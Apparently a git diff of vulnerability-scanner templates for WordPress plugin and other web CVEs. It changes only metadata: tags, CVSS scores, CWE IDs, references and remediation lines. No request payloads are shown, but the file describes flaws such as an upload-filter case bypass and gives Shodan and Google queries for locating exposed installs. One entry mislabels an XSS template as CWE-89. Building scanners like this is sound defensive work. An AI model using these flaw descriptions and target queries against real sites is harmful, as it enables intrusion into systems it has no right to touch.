version 4.1.8 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -18,7 +19,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2018,sqli,wordpress,wp-plugin,wp,gift-voucher,unauth + tags: sqli,wordpress,wpscan,cve,wp-plugin,wp,gift-voucher,unauth,cve2018 requests: - raw: diff --git a/cves/2021/CVE-2021-24145.yaml b/cves/2021/CVE-2021-24145.yaml index 37013d6849..3cb3a6e356 100644 --- a/cves/2021/CVE-2021-24145.yaml +++ b/cves/2021/CVE-2021-24145.yaml @@ -6,12 +6,12 @@ info: severity: high description: | Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. - remediation: Fixed in version 5.16.5 reference: - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip - https://github.com/dnr6419/CVE-2021-24145 - https://nvd.nist.gov/vuln/detail/CVE-2021-24145 + remediation: Fixed in version 5.16.5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 @@ -19,7 +19,7 @@ info: cwe-id: CWE-434 metadata: verified: "true" - tags: cve,cve2021,rce,wordpress,wp-plugin,wp,modern-events-calendar-lite,auth + tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce requests: - raw: diff --git a/cves/2021/CVE-2021-24155.yaml b/cves/2021/CVE-2021-24155.yaml index 75470165b5..73073e9d63 100644 --- a/cves/2021/CVE-2021-24155.yaml +++ b/cves/2021/CVE-2021-24155.yaml @@ -6,11 +6,11 @@ info: severity: high description: | The WordPress Backup and Migrate Plugin – Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. - remediation: Fixed in version 1.6.0 reference: - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb - https://wordpress.org/plugins/backup/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24155 + remediation: Fixed in version 1.6.0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 @@ -18,7 +18,7 @@ info: cwe-id: CWE-434 metadata: verified: "true" - tags: cve,cve2021,rce,wordpress,wp-plugin,wp,backup,authenticated + tags: wp-plugin,authenticated,wpscan,cve2021,rce,wordpress,cve,wp,backup requests: - raw: diff --git a/cves/2021/CVE-2021-24169.yaml b/cves/2021/CVE-2021-24169.yaml index 8cdebaf191..d33d26fafb 100644 --- a/cves/2021/CVE-2021-24169.yaml +++ b/cves/2021/CVE-2021-24169.yaml @@ -6,15 +6,20 @@ info: severity: medium description: | This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS. - remediation: Fixed in version 3.1.8 reference: - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 - https://www.exploit-db.com/exploits/50324 - https://wordpress.org/plugins/woo-order-export-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24169 + remediation: Fixed in version 3.1.8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24169 + cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2021,xss,wordpress,wp-plugin,wp,woo-order-export-lite,authenticated + tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb requests: - raw: diff --git a/cves/2021/CVE-2021-24287.yaml b/cves/2021/CVE-2021-24287.yaml index e374a9edcb..d3abe20d98 100644 --- a/cves/2021/CVE-2021-24287.yaml +++ b/cves/2021/CVE-2021-24287.yaml @@ -6,15 +6,20 @@ info: severity: medium description: | The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue - remediation: Fixed in version 1.3.2 reference: - https://www.exploit-db.com/exploits/50349 - https://nvd.nist.gov/vuln/detail/CVE-2021-24287 - https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf - https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/ + remediation: Fixed in version 1.3.2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24287 + cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2021,xss,wordpress,wp-plugin,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated + tags: wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,cve2021,xss,wp-plugin,cve,wordpress,edb requests: - raw: diff --git a/cves/2021/CVE-2021-24347.yaml b/cves/2021/CVE-2021-24347.yaml index 2d8bdc2b99..26dee8f9d6 100644 --- a/cves/2021/CVE-2021-24347.yaml +++ b/cves/2021/CVE-2021-24347.yaml @@ -6,19 +6,19 @@ info: severity: high description: | The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP". - remediation: Fixed in version 4.22 reference: - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a - https://wordpress.org/plugins/sp-client-document-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24347 + remediation: Fixed in version 4.22 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.3 + cvss-score: 8.8 cve-id: CVE-2021-24347 - cwe-id: CWE-434 + cwe-id: CWE-178 metadata: verified: "true" - tags: cve,cve2021,rce,wordpress,wp-plugin,wp,sp-client-document-manager,authenticated + tags: wp-plugin,wp,sp-client-document-manager,authenticated,wordpress,cve2021,rce,wpscan,cve requests: - raw: diff --git a/cves/2021/CVE-2021-24554.yaml b/cves/2021/CVE-2021-24554.yaml index 41b3e7d809..7acddadd6a 100644 --- a/cves/2021/CVE-2021-24554.yaml +++ b/cves/2021/CVE-2021-24554.yaml @@ -10,6 +10,7 @@ info: - https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad - https://wordpress.org/plugins/wp-paytm-pay/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24554 + - https://codevigilant.com/disclosure/2021/wp-plugin-wp-paytm-pay/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 @@ -17,7 +18,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay + tags: cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,cve requests: - raw: diff --git a/cves/2021/CVE-2021-24875.yaml b/cves/2021/CVE-2021-24875.yaml index a05bace62e..28e53177ba 100644 --- a/cves/2021/CVE-2021-24875.yaml +++ b/cves/2021/CVE-2021-24875.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,xss,wp,wordpress,wp-plugin,ecommerce-product-catalog,authenticated + tags: wp,authenticated,wpscan,ecommerce-product-catalog,cve,cve2022,xss,wordpress,wp-plugin requests: - raw: diff --git a/cves/2021/CVE-2021-24931.yaml b/cves/2021/CVE-2021-24931.yaml index 7c1088f562..4bbf89759f 100644 --- a/cves/2021/CVE-2021-24931.yaml +++ b/cves/2021/CVE-2021-24931.yaml @@ -6,11 +6,11 @@ info: severity: critical description: | The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection. - remediation: Fixed in version 2.8.2 reference: - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 - https://wordpress.org/plugins/secure-copy-content-protection/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24931 + remediation: Fixed in version 2.8.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -18,7 +18,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,secure-copy-content-protection,unauth + tags: wp-plugin,unauth,wpscan,cve2021,sqli,wordpress,cve,wp,secure-copy-content-protection requests: - raw: diff --git a/cves/2021/CVE-2021-25067.yaml b/cves/2021/CVE-2021-25067.yaml index 8379219a1c..4b5476a29c 100644 --- a/cves/2021/CVE-2021-25067.yaml +++ b/cves/2021/CVE-2021-25067.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2021,xss,wordpress,wp-plugin,wp,page-builder-add,authenticated + tags: xss,wordpress,authenticated,wpscan,cve,cve2021,wp-plugin,wp,page-builder-add requests: - raw: diff --git a/cves/2021/CVE-2021-27520.yaml b/cves/2021/CVE-2021-27520.yaml index 016e509822..409ccb0c10 100644 --- a/cves/2021/CVE-2021-27520.yaml +++ b/cves/2021/CVE-2021-27520.yaml @@ -9,10 +9,17 @@ info: reference: - https://www.exploit-db.com/exploits/49943 - https://nvd.nist.gov/vuln/detail/CVE-2021-27520 + - https://github.com/fudforum/FUDforum/issues/2 + - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-27520 + cwe-id: CWE-79 metadata: - verified: "true" shodan-query: html:"FUDforum" - tags: cve,cve2021,xss,fuddorum + verified: "true" + tags: cve,cve2021,xss,fuddorum,edb requests: - method: GET diff --git a/cves/2022/CVE-2022-0693.yaml b/cves/2022/CVE-2022-0693.yaml index f61c3eb9f7..be25a6da49 100644 --- a/cves/2022/CVE-2022-0693.yaml +++ b/cves/2022/CVE-2022-0693.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,master-elements,unauth + tags: unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,cve,cve2022 requests: - raw: diff --git a/cves/2022/CVE-2022-0760.yaml b/cves/2022/CVE-2022-0760.yaml index 9369addbf8..57dbae11c3 100644 --- a/cves/2022/CVE-2022-0760.yaml +++ b/cves/2022/CVE-2022-0760.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan requests: - raw: diff --git a/cves/2022/CVE-2022-0949.yaml b/cves/2022/CVE-2022-0949.yaml index fd2a4a4d54..24fcb69790 100644 --- a/cves/2022/CVE-2022-0949.yaml +++ b/cves/2022/CVE-2022-0949.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,stopbadbots,unauth + tags: cve,stopbadbots,wp-plugin,wp,unauth,wpscan,cve2022,sqli,wordpress variables: IP: '{{rand_ip("1.1.1.0/24")}}' diff --git a/cves/2022/CVE-2022-1013.yaml b/cves/2022/CVE-2022-1013.yaml index 0889ee7328..52a4159065 100644 --- a/cves/2022/CVE-2022-1013.yaml +++ b/cves/2022/CVE-2022-1013.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,personal-dictionary,unauth + tags: wp,unauth,wpscan,cve,cve2022,sqli,wordpress,wp-plugin,personal-dictionary requests: - raw: diff --git a/cves/2022/CVE-2022-3934.yaml b/cves/2022/CVE-2022-3934.yaml index e2abea2dd3..9fc8e3518f 100644 --- a/cves/2022/CVE-2022-3934.yaml +++ b/cves/2022/CVE-2022-3934.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,xss,flatpm,wordpress,wp-plugin,authenticated + tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin requests: - raw: diff --git a/cves/2022/CVE-2022-4060.yaml b/cves/2022/CVE-2022-4060.yaml index d873525362..18a29f9618 100644 --- a/cves/2022/CVE-2022-4060.yaml +++ b/cves/2022/CVE-2022-4060.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-94 metadata: verified: "true" - tags: cve,cve2022,rce,wordpress,wp-plugin,wp,wp-upg,unauth + tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg requests: - method: GET diff --git a/cves/2022/CVE-2022-4063.yaml b/cves/2022/CVE-2022-4063.yaml index 22a8aed2aa..620353b6f3 100644 --- a/cves/2022/CVE-2022-4063.yaml +++ b/cves/2022/CVE-2022-4063.yaml @@ -18,7 +18,7 @@ info: cwe-id: CWE-22 metadata: verified: "true" - tags: cve,cve2022,lfi,wordpress,wp-plugin,wp,inpost-gallery,unauth + tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan requests: - method: GET diff --git a/cves/2022/CVE-2022-46888.yaml b/cves/2022/CVE-2022-46888.yaml index 8c62092fbe..9fd31b9c58 100644 --- a/cves/2022/CVE-2022-46888.yaml +++ b/cves/2022/CVE-2022-46888.yaml @@ -9,9 +9,15 @@ info: reference: - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities - https://nvd.nist.gov/vuln/detail/CVE-2022-46888 + - https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-46888 + cwe-id: CWE-79 metadata: - verified: true shodan-query: http.favicon.hash:-582931176 + verified: "true" tags: cve,cve2022,nexus,php,nexusphp,xss requests: diff --git a/cves/2023/CVE-2023-23492.yaml b/cves/2023/CVE-2023-23492.yaml index fd89aeafcc..e5fdea20f6 100644 --- a/cves/2023/CVE-2023-23492.yaml +++ b/cves/2023/CVE-2023-23492.yaml @@ -3,7 +3,7 @@ id: CVE-2023-23492 info: name: Login with Phone Number - Cross-Site Scripting author: r3Y3r53 - severity: medium + severity: high description: | Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function. reference: @@ -11,10 +11,13 @@ info: - https://www.tenable.com/security/research/tra-2023-3 - https://nvd.nist.gov/vuln/detail/CVE-2023-23492 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2023-23492 + cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2023,login-with-phonenumber,wordpress,wp,wp-plugin,xss + tags: login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,cve,cve2023 requests: - method: GET diff --git a/vulnerabilities/wordpress/3d-print-lite-xss.yaml b/vulnerabilities/wordpress/3d-print-lite-xss.yaml index 8bf6c1c917..2a0851fd76 100644 --- a/vulnerabilities/wordpress/3d-print-lite-xss.yaml +++ b/vulnerabilities/wordpress/3d-print-lite-xss.yaml @@ -12,7 +12,7 @@ info: - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-3dprint-lite-cross-site-scripting-1-9-1-5/ metadata: verified: "true" - tags: xss,wordpress,wp-plugin,wp,3dprint,lite,authenticated + tags: 3dprint,lite,authenticated,wpscan,xss,wordpress,wp-plugin,wp requests: - raw: diff --git a/vulnerabilities/wordpress/wp-touch-redirect.yaml b/vulnerabilities/wordpress/wp-touch-redirect.yaml index 5078a00b94..4fa8bbb316 100644 --- a/vulnerabilities/wordpress/wp-touch-redirect.yaml +++ b/vulnerabilities/wordpress/wp-touch-redirect.yaml @@ -11,7 +11,7 @@ info: metadata: verified: "true" google-query: "inurl:/wp-content/plugins/wptouch" - tags: wptouch,unauth,redirect,wordpress,wp-plugin,wp + tags: wp-plugin,wp,packetstorm,wptouch,unauth,redirect,wordpress requests: - method: GET